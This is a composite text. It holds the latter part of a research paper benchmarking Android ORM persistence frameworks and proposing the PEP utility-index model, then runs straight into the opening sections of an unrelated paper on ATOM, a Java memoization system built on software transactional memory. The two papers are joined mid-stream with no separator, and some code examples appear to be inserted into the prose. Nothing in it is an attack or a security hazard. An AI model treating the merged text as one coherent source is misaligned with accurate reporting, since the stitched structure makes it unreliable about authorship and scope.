From Fig. 4, we observe that Java Realm and Sugar ORM have the longest execution time when executing the transactions whose major database operation is update (e.g., "New order", "New order rollback", "Payment by name", and "Payment by ID"). This conclusion is consistent with that derived from the Android ORM update experiments shown in Section 5.1. Android SQLite takes rather long to execute, as it involves database aggregation (e.g., sum, with the queried table holding 30,060 records) and arithmetic operations (e.g., field − 1) in the select clause. Meanwhile, as ActiveAndroid only uses the raw SQL manipulation interface for complex update operations (Table 1), it exhibits the best performance, albeit at the cost of additional programming effort. From Fig. 4(c)–(f) and Table 4 we conclude that: 1. ActiveAndroid offers the overall best performance for all DaCapo transactions.
It shows the best performance for the most common transactions, at the cost of additional programming effort. Besides, its execution invokes the smallest number of database operations, due to its caching mechanism. 2. Sugar ORM and Java Realm have the longest execution times, in line with the Android ORM benchmark's results discussed in Section 5.1. 3. greenDAO's performance is in the middle, while requiring the lowest programming effort, taking 24.5% fewer uncommented lines of code to implement than the other frameworks. 4. DBFlow takes more time and energy to execute than does ActiveAndroid; it also requires a higher programming effort than greenDAO does. Nevertheless, it strikes a good balance between the required programming effort and the resulting execution efficiency.

#### 5.3. Relationship of energy consumption, execution time, and DB operations

We also discuss the relationship between energy consumption, execution time, and database operations. We combine all the previously collected read/write, execution time, and energy consumption data from all the benchmarks. As shown in Fig. 5(a), the number of total database operations (Read and Write) has a dominating impact on both the execution time and energy consumption: (1) as the number of data operations increases, so usually do the execution time and energy consumption; (2) the execution time and energy consumption are also impacted by other factors (e.g., the complexity of data operations, the framework's implementation design choices, etc.). Meanwhile, as shown in Fig. 5(b), there is a significant positive relationship between the time consumption and the energy consumption, with \( r(142) = 0.99, p < 0.001 \). Hence, the longer a database task executes, the more energy it ends up consuming.

### 6. Numerical model

The experiments above show that for the same application scenario different frameworks exhibit different execution time, energy consumption, and programming effort.
However, to derive practical benefits from these insights, mobile app developers need a way to quantify these trade-offs for any combination of an application scenario and a persistence framework. To that end, we propose a numerical model, PEP (Performance, Energy consumption, and Programming effort), for mobile app developers to systematically evaluate the suitability of persistence frameworks.

#### 6.1. Design of the PEP model

Our numerical model follows a commonly used technique for evaluating software products called a utility index (Christodoulou et al., 2009). Products with equivalent functionality possess multidimensional feature sets, and a utility index is a score that quantifies the overall performance of each product, allowing the products to be compared with each other. As our experiments show, the utility of persistence frameworks is closely related to application features (e.g., data schema complexity, operations involved, data records manipulated, database operations executed). Therefore, it is only meaningful to compare the persistence frameworks within the context of a certain application scenario. Here, we use \( p \) to denote an application with a set of features. Let \( \mathcal{O} = \{1, 2, 3 \ldots \} \) be a set of frameworks. Let \( E_{\sigma}(p), \forall \sigma \in \mathcal{O} \) denote the energy consumption of different implementations of \( p \) using various frameworks \( \sigma \), while \( T_{\sigma}(p), \forall \sigma \in \mathcal{O} \) denotes the execution time. As the energy consumption and the execution time of database operations correlate linearly in our experimental results, we use the Euclidean norm of the two-dimensional vector to quantify the overall performance, which can be denoted as

\[ P_{\sigma}(p) = \sqrt{T_{\sigma}(p)^2 + E_{\sigma}(p)^2}, \quad \forall \sigma \in \mathcal{O}.
\]

The programming effort is represented by the ULOC, and here we use \( L_{\sigma}(p), \forall \sigma \in \mathcal{O} \) to denote the programming effort of different implementations of the project \( p \) using the different persistence frameworks. We consider both the framework's performance and programming effort to compute the utility index \( I_{\sigma}(p) \):

\[ I_{\sigma}(p) = \frac{\min_{\sigma' \in \mathcal{O}} P_{\sigma'}(p) / P_{\sigma}(p)}{L_{\sigma}(p) / \min_{\sigma' \in \mathcal{O}} L_{\sigma'}(p)}, \quad \forall \sigma \in \mathcal{O} \]  (2)

The equation's numerator, \( \min_{\sigma' \in \mathcal{O}} P_{\sigma'}(p) / P_{\sigma}(p) \), compares the performance of a mobile app implemented by means of the persistence framework \( \sigma \) against the implementation that has the best performance. The equation's denominator, \( L_{\sigma}(p) / \min_{\sigma' \in \mathcal{O}} L_{\sigma'}(p) \), compares the programming effort of the \( \sigma \)-based implementation against the implementation that requires the minimal programming effort. When the utility index \( I_{\sigma}(p) \) of a framework \( \sigma \)-based implementation is close to 1, the implementation is likely to offer acceptable performance with low programming effort.

Consider the following example that demonstrates how to calculate the utility index. Suppose that for an app \( p \), Android SQLite provides the best performance, while the greenDAO-based implementation consumes twice the energy and takes twice the execution time. The performance ratio of the greenDAO-based implementation is therefore 0.5. On the other hand, suppose the greenDAO-based implementation requires the lowest programming effort, as measured by the ULOC metric, so its effort ratio is 1. Thus, the overall utility index is \( 0.5/1 = 0.5 \).

Application developers apply dissimilar standards to judge the trade-offs between performance and programming effort. Some developers focus solely on performance, while others may prefer the shortest time-to-market.
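As a concrete illustration, the utility-index computation of this section can be sketched in Python. The framework names and numbers below are hypothetical, chosen to reproduce the worked example above; the optional exponent `tau` implements the preference weight \( \tau \) introduced in this section.

```python
def utility_index(perf, effort, tau=1.0):
    """Compute the PEP utility index for each framework.
    perf:   dict framework -> overall performance P_sigma(p) (lower is better)
    effort: dict framework -> programming effort L_sigma(p) in ULOC
    tau > 1 weights programming effort more; tau < 1 weights performance."""
    best_perf = min(perf.values())
    least_effort = min(effort.values())
    return {f: (best_perf / perf[f]) / ((effort[f] / least_effort) ** tau)
            for f in perf}

# Hypothetical numbers reproducing the worked example: "greenDAO" takes twice
# the time/energy of "SQLite" but needs the least code.
perf = {"SQLite": 1.0, "greenDAO": 2.0}
effort = {"SQLite": 300, "greenDAO": 240}
idx = utility_index(perf, effort)
print(idx["greenDAO"])  # 0.5
print(idx["SQLite"])    # 0.8
```

With `tau = 1` the index reduces to the plain performance/effort ratio; raising `tau` above 1 penalizes code-heavy frameworks more strongly.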
We introduce \( \tau \) to express these preferences:

\[ I_{\sigma}(p) = \frac{\min_{\sigma' \in \mathcal{O}} P_{\sigma'}(p) / P_{\sigma}(p)}{\left( L_{\sigma}(p) / \min_{\sigma' \in \mathcal{O}} L_{\sigma'}(p) \right)^{\tau}}, \quad \forall \sigma \in \mathcal{O} \]  (3)

where \( \tau > 0 \). When \( \tau > 1 \), the larger \( \tau \) is, the more weight is assigned to the programming effort target. Otherwise, when \( \tau < 1 \), the lower \( \tau \) is, the more weight is assigned to the performance target.

#### 6.2. Evaluating the benchmarks

To provide an insight into how the persistence frameworks evaluated in this article fit different application scenarios, we apply the PEP model to the Android ORM and DaCapo benchmarks. We consider typical low and high transaction volumes, respectively, for each benchmark. Specifically, for the Android ORM benchmark, we evaluate two sets of input, 1025 transactions and 20,025 transactions. For the DaCapo benchmark, we evaluate two sets of input, 40 transactions and 1500 transactions. For each input set, we assign \( \tau \) the values 0.5, 1, and 1.5, in turn, to model whether the developers are willing to invest extra effort to improve performance. Specifically, when \( \tau = 0.5 \), the developer's main concern is performance; when \( \tau = 1 \), a balance of performance and programming effort is desired; when \( \tau = 1.5 \), the developer wishes to minimize the programming effort. Table 5 shows the calculated index values of the persistence frameworks for all cases.

From the results presented in Table 5, we can draw several conclusions: (1) For the DaCapo benchmark, or similar mobile apps with heavy data processing functionality and complicated data structures, DBFlow represents the best performance/programming effort trade-off.
When the number of data operations is very high, ActiveAndroid should also be considered, as it provides the best execution performance, especially when the programmer is less concerned about minimizing the programming effort; (2) For the Android ORM benchmark or similar mobile apps with less complicated data structures, when the number of data operations is small, the top choice is Paper, as this framework reduces the programming effort while providing high execution efficiency. However, when the number of data operations surpasses a certain threshold (over 10K simple data operations), the execution performance of Paper drops sharply due to scalability issues. In such cases, greenDAO and Android SQLite would be the recommended options. In the following discussion, we use hypothetical use cases to demonstrate how the generated guidelines can help mobile app developers pick the best framework for the application scenario at hand. Consider four cases: (1) a developer wants to persist the user’s application-specific color scheme preferences; (2) a team of developers wants to develop a production-level contact book application; (3) an off-line map navigation application needs to store hundreds of MBs of data, comprising map fragments, points of interest, and navigation routines; (4) an MP3 player app needs to retrieve the artist’s information based on some features of the MP3 being played. For use case 1, the main focus during development is to lower the programming effort, while the data structures and the number of data operations are simple and small. Therefore, for this use case, we would recommend using Paper. For use case 2, the main focus is to improve responsiveness and efficiency, as the potential data volume can get quite large. Given that minimizing the programming effort is deprioritized, we would recommend using greenDAO or Android SQLite.
For use case 3, complex data structures are required to handle the potentially large data volumes, while navigation apps are expected to maintain quick responsiveness and high efficiency. Therefore, we would recommend using ActiveAndroid. For use case 4, the main application feature is playing MP3s, and the ability to retrieve the artist’s data instantaneously is non-essential. To save the programming effort of this somewhat auxiliary feature, we would recommend using DBFlow.

### 7. Threats to validity

Next, we discuss the threats to the validity of our experimental results. Although in designing our experimental evaluation we tried to perform as objective an assessment as possible, our design choices could certainly have affected the validity and applicability of our conclusions. The key external threat to validity is our choice of hardware devices, Android version, and profiling equipment. Specifically, we conducted our experiments with an LG mobile phone, with a 1.2 GHz quad-core Qualcomm Snapdragon 400 processor, running Android 4.4.2 KitKat, profiled with the Monsoon Power Monitor. Even though these experimental parameters are representative of the Android computing ecosystem, changing any of these parameters could have affected some outcomes of our experiments. The key internal threat to validity is our design choices for structuring the database and the persistence application functionality. Specifically, while our Android ORM benchmark set explores the object features of Android persistence frameworks, the original DaCapo (Blackburn et al., 2006) H2 benchmark manipulates relational database structures directly, without stress-testing the object-oriented persistence frameworks around it. To re-target DaCapo to focus on persistence frameworks rather than the JVM alone, we adapted the benchmark to make use of transparent persistence as a means of accessing its database-related functionality.
Nevertheless, given the relatively large scale of its data volume, with the select and update operations of bank transactions dominating the execution, this benchmark is representative of a large class of database application systems, but not all of them. Besides, we have not tested our PEP model on real-world applications. Hence, it is not yet confirmed how accurate the model would be for such applications.

### 8. Conclusions

In this paper, we present a systematic study of popular Android ORM/DB persistence frameworks. We first compare and contrast the frameworks to present an overview of their features and capabilities. Then we present our experimental design of two sets of benchmarks, used to explore the execution time, energy consumption, and programming effort of these frameworks in different application scenarios. We analyze our experimental results in the context of the analyzed frameworks’ features and capabilities. Finally, we propose a numerical model to help guide mobile developers in their decision-making process when choosing a persistence framework for a given application scenario. To the best of our knowledge, this research is the first step to better understand the trade-offs between the execution time, energy efficiency, and programming effort of Android persistence frameworks. As a future work direction, we plan to apply the PEP model presented above to real-world applications, in order to assess its accuracy and applicability.

Acknowledgment

This research is supported by the National Science Foundation through Grants CCF-1649583 and CCF-1717065. The authors would like to thank the anonymous reviewers, whose insightful comments helped improve this article.

Supplementary material

Supplementary material associated with this article can be found, in the online version, at doi:10.1016/j.jss.2018.08.038.

References

Zheng Song is a Ph.D. student in the computer science department of Virginia Tech.
His research interests include mobile computing and software engineering. Junjie Cheng is a 4th-year undergraduate student in the computer science department of Virginia Tech. Jing Pu holds a master's degree in computer science from Virginia Tech. Eli Tilevich is an associate professor in the department of computer science of Virginia Tech. His research interests include the systems end of software engineering; distributed systems and middleware; automated software transformation; mobile applications; energy-efficient software; CS education; and music informatics.
Memoization of Methods Using Software Transactional Memory to Track Internal State Dependencies Hugo Rito INESC-ID Lisboa/Technical University of Lisbon hugo.rito@ist.utl.pt João Cachopo INESC-ID Lisboa/Technical University of Lisbon joao.cachopo@ist.utl.pt Abstract Memoization is a well-known technique for improving the performance of a program, but it has been confined mostly to functional programming, where no mutable state or side-effects exist. Most object-oriented programs, however, are built around objects with an internal state that is mutable over the course of the program. Therefore, the execution of methods often depends on the internal state of some objects or produces side-effects, thus making the application of memoization impractical for object-oriented programs in general. In this paper, we propose an extended memoization approach that builds on the support provided by a Software Transactional Memory (STM) to identify both internal state dependencies and side-effects, hence removing many of the limitations of traditional memoization. We describe the Automatic Transaction-Oriented Memoization (ATOM) system, a thread-safe implementation of our memoization model that requires minimal learning effort from programmers, while offering a simple and customizable interface. Additionally, we describe a memoization advisory system that collects per-method performance statistics with the ultimate goal of aiding programmers in their task of choosing which methods are profitable to memoize. We argue that ATOM is the first memoization system adequate to the unique characteristics of object-oriented programs and we show how memoization can be implemented almost for free in systems that use an STM, presenting the reasons why this synergy can be particularly useful in transactional contexts. 
We show the usefulness of memoizing object-oriented programs by applying memoization to the STMBench7 benchmark, a standard benchmark developed for evaluating STM implementations. The memoized version of the benchmark shows up to a 14-fold increase in the throughput for a read-dominated workload. Categories and Subject Descriptors D.1.5 [PROGRAMMING TECHNIQUES]: Object-Oriented Programming General Terms Performance Keywords Memoization, Object-Oriented Programming, Software Transactional Memory 1. Introduction Memoization [11] is a well-known technique for improving the performance of functional programs in a transparent way, without changing their semantics. The key idea behind memoization is that we may speedup the execution of a function if we maintain a cache of previous computations and return results from that cache instead of computing the results again. Because the result returned by a pure function depends only on the arguments supplied to the function, it is sufficient to use those arguments as the cache-key. That simple approach, however, does not work in general for object-oriented programs. In the object-oriented programming paradigm, objects maintain internal state that influence the objects’ behaviors and, in general, this state changes over time. This differentiating characteristic of object-oriented programs hinders the application of memoization because the outcome of a method often depends not only on the arguments supplied to the method but also on the internal state of objects, which must be, therefore, taken into consideration when building the cache-key. Objects with mutable internal state raise problems to concurrent programs, also. In a context where concurrent threads may read from and write to shared objects, programmers need to ensure that threads observe the state of shared objects and perform actions on that state in a consistent manner. 
To tackle this problem, much of the recent work on concurrent programming explores the idea of using a Software Transactional Memory (STM) [14], which introduces the notion of atomic actions, or transactions, into the programming model. With an STM, programmers specify which operations must execute atomically, leaving to the STM the responsibility of providing the intended semantics, while maintaining as much parallelism and concurrency as possible. Typically, this is accomplished by intercepting and registering all accesses to (transactional) memory locations in a per-transaction log, which is used to validate transactions and to ensure atomicity and isolation between threads. In this paper, we present a solution to the problem of applying memoization to object-oriented programs that is based on the information collected by a software transactional memory runtime. We assume that every mutable memory location is under the control of an STM, meaning that a program may need to be transactified before we apply our memoization solution to it. The details of how a program may be transactified, however, are out of the scope of this paper: We will assume that either the underlying runtime system provides already an STM-based support for the execution of the program, or the program was correctly transactified before (either manually, or automatically through a transactification tool such as JaSPEx [2]). Our proposal was implemented as the Automatic Transaction-Oriented Memoization (ATOM) system, a Java implementation of our memoization model that extends the Java Versioned STM (JVSTM). 
To the best of our knowledge, ATOM is the first automatic memoization system that addresses the unique characteristics of object-oriented programs because: (1) it allows memoizing methods that depend on the internal state of objects (rather than only pure functions that depend only on their arguments), (2) it prevents errors in memoizing unintended methods, (3) it allows memoizing methods that have side-effects, and (4) it offers a memoization advisory tool that aids programmers in choosing which methods are profitable to memoize. In the next section we review what memoization is and show the pitfalls of applying memoization in object-oriented programs. We briefly introduce the concept of Software Transactional Memory in Section 3, with special emphasis on the Java Versioned STM. In Section 4, we present the core ideas of our work, and then, in Section 5, we describe its implementation. In Section 6, we present some results obtained from the STMBench7 benchmark. In Section 7, we discuss related work, and, finally, in Section 8, we draw some conclusions and discuss future work. 2. Memoization Memoization is a function-level optimization technique that improves the performance of programs in exchange for extra memory space: To avoid future repeated work, each memoized function is augmented with a cache that stores the results of previous computations. A performance increase is possible if it is faster to search the cache for a match than to reexecute the original function and, of course, there is a cache hit (meaning that the result stored in the cache is returned). To apply memoization it is essential that we define what the relevant values for a computation are, because only by doing so will we be able to build a cache-key that allows a correct classification of computations as repeated or not. We classify a particular value as relevant for a computation’s result if the result of the computation may be different when the aforementioned value changes.
Likewise, we define the list containing all the relevant values that are significant for a computation as the relevant state of said computation. In functional contexts it is simple to build the relevant state because the result of a function is fully defined by the function’s arguments. Thus, the list of arguments received as input by the memoized function may be used as the cache-key. As we will see, the same approach may not apply to methods in object-oriented contexts. 2.1 The pitfalls of applying memoization in object-oriented programs To introduce the problems of applying memoization to object-oriented programs and later illustrate our approach, we shall use a minimalist example of an application from the banking domain. In particular, suppose that the application deals only with two types of entities: accounts and clients. Accounts have a current balance, which corresponds to some monetary amount in some particular monetary currency. Clients may have any number of accounts, can deposit money to any account, but can issue withdrawals only from accounts that they own. These operations change the respective account’s current balance in accordance with the amount deposited or withdrawn. Clients may also query the bank for their total balance—that is, the sum of the balance of all the accounts that they own. This minimalist example is representative of typical object-oriented programs, where some objects have an internal state that may change over time (in this case, both the account’s and the client’s state may change). In the following, we give a brief overview of the problems that this mutable state poses to memoization. 2.1.1 The problem of depending on the internal state of objects Consider the implementation of the Client and the Account classes shown in Listing 1. Furthermore, assume that, for performance reasons, we want to memoize the getTotalBalance method. 
```java class Account { long balance; } class Client { Set<Account> accounts; long getTotalBalance() { long total = 0; for (Account acc : accounts) { total += acc.balance; } return total; } } ``` Listing 1. Java implementation of the classes Client and Account. To do it safely, we need to identify what may possibly change a client’s total balance—that is, what are the relevant values for the output of the method getTotalBalance. A client’s total balance may change every time the client opens a new account, closes an account, or changes the balance of one of its accounts. Thus, we need to reexecute the method getTotalBalance every time that there is a change on the content of the slot accounts or on the value of the slot balance of one of the Account instances contained in the accounts slot. From this example it is clear that the approach followed in functional programs, of using the function’s list of arguments as the cache-key, cannot be directly applied in object-oriented programs, because the list of relevant values encompasses not only the list of arguments supplied to the memoized method, but also values read from the internal state of objects. Knowing that the list of arguments is not suited to classify computations as repeated or not, a naive approach would be to include in the cache-key the content of the set accounts and the balance of each Account instance contained within the accounts set. In fact, in this simple example that may solve the problem. Yet, in the general case, of more complex methods where the set of fields accessed is much larger and the relevant state depends on which execution path is taken or on what other methods are called, it is unfeasible to determine manually the correct set of fields to use in the cache-key. 
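To make the pitfall concrete, the following self-contained sketch (ours, not from the paper) memoizes getTotalBalance using only the argument list as the cache key; since the method takes no arguments, the cache degenerates to a single stored result. After the balance of an account changes, the cache keeps returning the stale total.

```java
import java.util.HashSet;
import java.util.Set;

// Illustrative only: a naively memoized variant of Listing 1 that ignores
// internal state dependencies, demonstrating the stale-result problem.
public class NaiveMemoClient {
    public static class Account {
        public long balance;
        public Account(long b) { balance = b; }
    }

    public final Set<Account> accounts = new HashSet<>();
    private Long cachedTotal; // "cache" keyed on the (empty) argument list

    public long getTotalBalance() {
        if (cachedTotal != null) return cachedTotal; // cache hit: skip the loop
        long total = 0;
        for (Account acc : accounts) total += acc.balance;
        cachedTotal = total; // never invalidated when accounts change!
        return total;
    }

    public static void main(String[] args) {
        NaiveMemoClient client = new NaiveMemoClient();
        Account acc = new Account(100);
        client.accounts.add(acc);
        System.out.println(client.getTotalBalance()); // 100 (computed)
        acc.balance += 50;                            // internal state changes
        System.out.println(client.getTotalBalance()); // 100 again: stale!
    }
}
```

The correct total after the deposit is 150, yet the memoized method keeps answering 100, which is exactly why the read locations themselves must become part of the cached information.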
Another problem with internal state dependencies is that it is not simple to store in the cache information regarding the locations from where relevant values were retrieved, so that, in future reexecutions, we can inspect those cached locations to check if they still hold the same value. 2.1.2 The problem of side-effects Without risking a semantic change, we can skip the execution of a method only if the method is referentially transparent. A method is referentially transparent if calling the method has the exact same effect as replacing the method call with its return value. This means that memoization is not applicable to methods with side-effects, such as, for instance, methods that do I/O or that change the internal state of some object. The problem is that methods with side-effects are common in object-oriented programs and represent a tangible risk when memoized: Skipping their execution after a cache hit may lead to an inconsistent system state. This impossibility directly influences how memoization is done in imperative systems because, unlike what happens in functional environments, it is no longer safe to memoize any method of the system. Thus, to guarantee correct system semantics, we need to classify methods as producing side-effects or not. In polymorphic environments and in the presence of deep and complex call-chains, doing this classification manually is time-consuming, hard, and error-prone. Moreover, even assuming that we could identify methods without side-effects, nothing prevents future iterations of the system from introducing side-effects, either directly or indirectly, on methods’ executions that had none before. So, after each change to the system, we have to revise all memoized methods to look for potential side-effects.
In practice, this means that, without support from the memoization tool, we will never be sure that a method’s execution that produces side-effects will not be skipped due to being inadvertently memoized or being called inside a memoized method. Thus, an adequate memoization tool would remove this burden from the programmers shoulders, by automatically identifying methods with side-effects. Once we know which methods have side-effects, it is easy to prevent the memoization of those methods. Yet, if we allow only a reduced subset of the system to be memoized, this subset may not be enough to obtain more than marginal improvements in performance. On the other hand, if we relax this prohibition, allowing methods that produce side-effects to be memoized, we extend the applicability of memoization to any method of an imperative system. The difficulty here is how to replicate the behavior of a memoized method that is not referentially transparent—that is, how to preserve the semantics of the program in the presence of memoized methods that may produce side-effects. 3. Software Transactional Memory The advent of multicore architectures highlighted the necessity for adequate parallel programming abstractions that help programmers build systems that take full advantage of the underlying hardware platform. That is the main motivation behind the work on Software Transactional Memory, which brought the expressiveness of transactions to mainstream programming, leaving behind the cumbersome work of explicit lock-based constructions. From the perspective of an STM, operations executed within a transaction do not have a special meaning associated with them: They are just a series of reads from and writes to shared memory locations. STMs intercept these accesses to shared memory and log into a per-transaction read-set what locations were read and into a per-transaction write-set what locations were written. 
Changes made during a transaction are made permanent only at the transaction’s end (commit time) and only when the transactional system can assure that there are no consistency violations. So, the commit of a transaction is responsible for detecting conflicts and can yield one of two possible results: - success—all of the values written by the transaction were applied to the shared system state. - fail—none of the values written were applied and the transaction should be restarted. Transactions can be decomposed into subtransactions, which, in turn, can be decomposed into more subtransactions, forming an arbitrarily deep hierarchy of nested transactions. A nested transaction is created every time a new transaction is started in the context of a surrounding transaction. The JVSTM [4] is a multi-versioned object-oriented STM implemented as a pure Java library that was conceived with read-dominated, domain-intensive applications in mind. The JVSTM introduces the concept of versioned boxes (VBox) to keep multiple versions of each shared mutable location. A VBox instance holds a sequence of values that corresponds to a successful assignment made to the box by a successfully committed transaction. Each element of this history is tagged with a version number that corresponds to the number of the transaction that made the change. To use the JVSTM, programmers need to transactify their programs. In Listing 2, we show the changes needed to make both the Client class and the Account class transactional. We replaced the Client’s accounts field with an instance of a transactional versioned set VSet, we encapsulated slot balance from the class Account inside a versioned box, and we made the getTotalBalance method atomic by using the @Atomic annotation. ```java class Account { VBox<Long> balance; } class Client { VSet<Account> accounts; @Atomic long getTotalBalance() { long total = 0; for (Account acc : accounts) { total += acc.balance.get(); } return total; } } ``` Listing 2. 
JVSTM-based implementation of the Client class and the Account class from the banking domain example. The bold-faced lines represent new code that was not present in the original implementation of both classes. The method get of a versioned box returns the current value stored in the box. The JVSTM makes a clear distinction between read-write transactions and read-only transactions. A transaction is read-write if it writes to at least one box, and read-only otherwise. Given that, in the JVSTM, read-only transactions never conflict, registering all the boxes that are read during the transaction in the transaction’s read-set is useless work. Thus, only read-write transactions keep a read-set. Because it is not possible to know beforehand a transaction’s nature, the JVSTM speculatively assumes that a transaction is read-only when it starts, revising this assumption as soon as the transaction tries to write to a box, in which case the transaction is restarted as a read-write transaction. 4. Extending the applicability of memoization As we saw in Section 2.1, to extend the applicability of memoization to object-oriented programs we need to address two main problems. First, we need to be able to capture all the relevant values for a method’s result, which typically include not only the values received as arguments, but also values belonging to the internal state of some objects. Second, we need to identify which methods have side-effects, so that we may choose either to not memoize them or to collect sufficient information to replicate correctly their behavior. We show in this section how we propose to use STMs to achieve both goals. 
1 Source code available at http://web.ist.utl.pt/joao.cachopo/jvstm/ 4.1 Finding the relevant state To solve the problem of constructing the relevant state for a method’s result, we propose to use the support already provided by an STM: If a memoized method executes inside an STM transaction, then all of the memory read operations made by the execution of the method will be registered in the transaction’s read-set. Thus, at the end of the transaction we will know which values were read by the method, thereby capturing the relevant state for this particular method’s result. This approach has a second advantage. If we recall what was discussed in Section 2.1.1, to correctly handle relevant states, besides registering which values were read, we must be able to store in the cache information regarding the locations from where those values were retrieved. Once again the underlying transactional system offers the solution for this problem. Because versioned boxes reify the concept of mutable locations, we can simply store in the cache all the instances of versioned boxes belonging to the read-set, knowing that a particular versioned box instance uniquely identifies a memory location and allows the memoization system to query its current content. Thus, by storing the read-set in the cache, the next time the memoized method is called we can check if each versioned box that belongs to the stored read-set preserves the same value as when the method originally executed. If so, there is a cache hit and the method’s execution is skipped. Otherwise, we must reexecute the method. 4.2 Identifying side-effects If we are trying to build an automatic memoization tool that is appropriate for imperative contexts, we must be aware that dealing with methods that are not referentially transparent is crucial not only for a successful memoization process, but more importantly, for determining the applicability of this optimization technique.
Thus, we must adopt one of the two following approaches regarding side-effects: (1) offer the conventional semantics associated with memoization, not memoizing methods that produce side-effects, or (2) extend the concept of memoization to methods with side-effects. Obviously, the first approach is simpler to implement because we need only to identify methods with side-effects and prohibit memoization in such cases. Given that all methods are executing inside an STM transaction to capture the internal state dependencies, once the transaction finishes we may look at the transaction’s write-set to see whether the method wrote to any memory location; if it did, then we do not memoize this call; otherwise, we may memoize it as described before. A beneficial property of this approach is that we do not classify methods as a whole as producing side-effects or not. Rather, we identify whether a particular method execution produces side-effects or not, maximizing the possibility of using traditional memoization. Turning our attention now to the second approach identified above, to memoize a method that produces side-effects we need to reproduce its external behavior upon a cache hit. This external behavior includes replicating its return value, as it is done with referentially transparent methods, but also correctly changing all the memory locations that would be written if the method executed. Once more we may use the STM to obtain the intended behavior: Looking at the write-set, we may see which boxes were written and with what value. So, it is possible to memoize any method that produces memory side-effects if we store the write-set in the cache and in the future, after a cache hit, we iterate over the associated write-set and reapply all the changes as an additional step of the memoization process. 5. The ATOM system In this section we introduce the Automatic Transaction-Oriented Memoization (ATOM) system. 
The ATOM system implements the STM-based approach, described in Section 4, of using a transaction’s read-set to capture the relevant state for a particular result and the write-set to identify side-effect-free executions or to register possible write operations, so that it may apply them in future reexecutions of the same memoized method.
5.1 The ATOM API
The ATOM system is implemented as a pure-Java library and, given that we tried to keep its interface as small and simple to use as possible, provides only a single interface for programmers—the @Memo annotation. Classes with methods that use this annotation are post-processed and rewritten, thus programmers just need to express their intention, as shown in Listing 3. The automatic transformation is done as a step of the compilation phase and uses the ASM [3] library for bytecode manipulation.

```java
@Memo
long getTotalBalance() {...}
```

Listing 3. Use of the annotation @Memo to memoize the method getTotalBalance.
For each annotated method, the transformation process inserts in the class a new slot, named after the method to memoize, to hold an instance of a MemoCache. Because Java allows for method overloading (several methods may have the same name as long as they differ in the types of their input arguments), to ensure the uniqueness of this name, as well as an unambiguous relationship between the memoized method and its respective method cache, each inserted slot’s name is prefixed with “$cache” and suffixed with the types of the arguments of the memoized method. If the annotated method is static, the transformation process inserts a static slot to hold the memo cache. Then, each memoized method’s body is changed by adding a preamble that does a cache search, complemented with the respective decision of whether to execute the method or not, and by preceding each return instruction with a call to the memo cache method that collects information regarding the execution.
When this process ends, each new class definition is written over the original class file. Listing 4 shows the body of a memoized method after being transformed. As we can see, all the memoization behavior is implemented by the MemoCache class, which will be discussed in the next section. The decision to augment each memoized method with a memo cache relates to the fact that, most often, the receiver of the message (the instance on which the method is being invoked) influences the outcome of the method. Thus, spreading the cache over all of the objects of a class, rather than having a single cache for all of them, naturally partitions the cache and simplifies its maintenance, because when an object is garbage-collected, so is the portion of the cache that belongs to it.
5.2 The MemoCache class
The MemoCache class, shown in skeletal form in Listing 5, implements the memoization strategy described in Section 4. Each in-
---
2 Source code available at http://web.ist.utl.pt/hugo.rito/
3 The @Memo annotation also provides the same semantics as the @Atomic annotation and, thus, replaces it.

```java
class Client {
    VSet<Account> accounts;
    MemoCache $cache_getTotalBalance;

    @Atomic long getTotalBalance() {
        Object[] args = new Object[0];
        Object res = $cache_getTotalBalance.search(args);
        if (res != MemoCache.notFound) return (Long) res;
        long total = 0;
        for (Account acc : accounts) {
            total += acc.balance.get();
        }
        $cache_getTotalBalance.collectInformation(args, total);
        return total;
    }
}
```

Listing 4. The memoized version of method getTotalBalance. The changes done by the ATOM are highlighted in boldface.
5.3 Implementation of the memoization cache
The memo cache (Figure 1) is organized in two levels: The first level is composed of all the information available at call time—the arguments supplied to the memoized method—and maps to a second level which holds information observable only after the method executes—that is, the captured read-set, the returned result, and, possibly, a write-set. Because the JVSTM is a multi-versioned STM, we may have concurrent threads executing in different versions of the system. So, to maximize the probability of a cache hit, we allow threads that are executing in a more recent state of the system to update the memo cache without overriding entries that may be useful for lagging transactions. Thus, the second level of the memo cache contains not one but a fixed-size array of entries. Given that, in general, it is not possible to determine the maximum number of concurrent threads, we limit the size of the array to the number of available processors. A cache search begins with a table lookup on the first level of the MemoCache, using the list of arguments supplied to the memoized method. Once we obtain a second-level array, the search algorithm iterates over all the second-level entries looking for a valid read-set, starting with the most recently added one. Intuitively, a read-set is valid if and only if all the boxes in it still hold the same value as when the read-set was stored in the cache. To see whether a box still has the same value as before, the ATOM system offers three caching policies: version, value, and identity. The version caching policy considers that a box still has the same value if and only if it is still in the same version (meaning that no write occurred to this box).
It is theoretically the fastest of the three caching policies, because it needs only a simple integer equality test to check whether one entry of the relevant state is still valid, but it may lead to fewer hits: from the moment a box changes value, any cache entry that depends on that particular box will forever be invalid. It is also the policy that consumes the least memory, because it saves only the versioned boxes read by the memoized method, not caching the values that were read. The value caching policy checks whether the current value of the box, regardless of its version, is equal to the value seen before. This second policy may lead to more hits than the previous one because it allows a box to change value and still keep cache entries valid, provided that, when the cache entries are checked, the box has the same value as it did when the entries were created. It is also the only caching policy that gives programmers the opportunity to control the validation process by defining their own custom implementation of the method equals, which is used to compare cached values. The drawbacks of this caching policy are that it assumes that the method equals is correctly defined for the values stored in the boxes and that its time complexity depends on the complexity of that method. The identity caching policy checks whether each cached versioned box references the same object in memory as the value that was read—that is, whether both objects are "=="-equal. If so, then the entry is still valid. This last policy offers not only the conventional semantics used in reference models to compare values for equality, but also constitutes an interesting compromise between the other two caching policies: a simple and fast comparison test that allows a box to change value and still keep cache entries valid.
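The three validation checks can be contrasted in a few lines. This is a sketch under the simplifying assumption that a cached read records the box together with the version and the value observed when the method executed; the class names are ours, not ATOM’s.

```java
import java.util.Objects;

class VersionedBox {
    Object value;
    int version = 0;
    VersionedBox(Object v) { value = v; }
    void put(Object v) { value = v; version++; }
}

class CachedRead {
    final VersionedBox box;
    final int seenVersion;     // version at the time the memoized method executed
    final Object seenValue;    // value at the time the memoized method executed

    CachedRead(VersionedBox b) { box = b; seenVersion = b.version; seenValue = b.value; }

    boolean validByVersion()  { return box.version == seenVersion; }           // cheapest: one integer test
    boolean validByValue()    { return Objects.equals(box.value, seenValue); } // relies on equals()
    boolean validByIdentity() { return box.value == seenValue; }               // reference comparison
}
```

Writing an equal-but-distinct object into the box illustrates the difference: the version policy invalidates the entry, the value policy keeps it, and the identity policy invalidates it.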
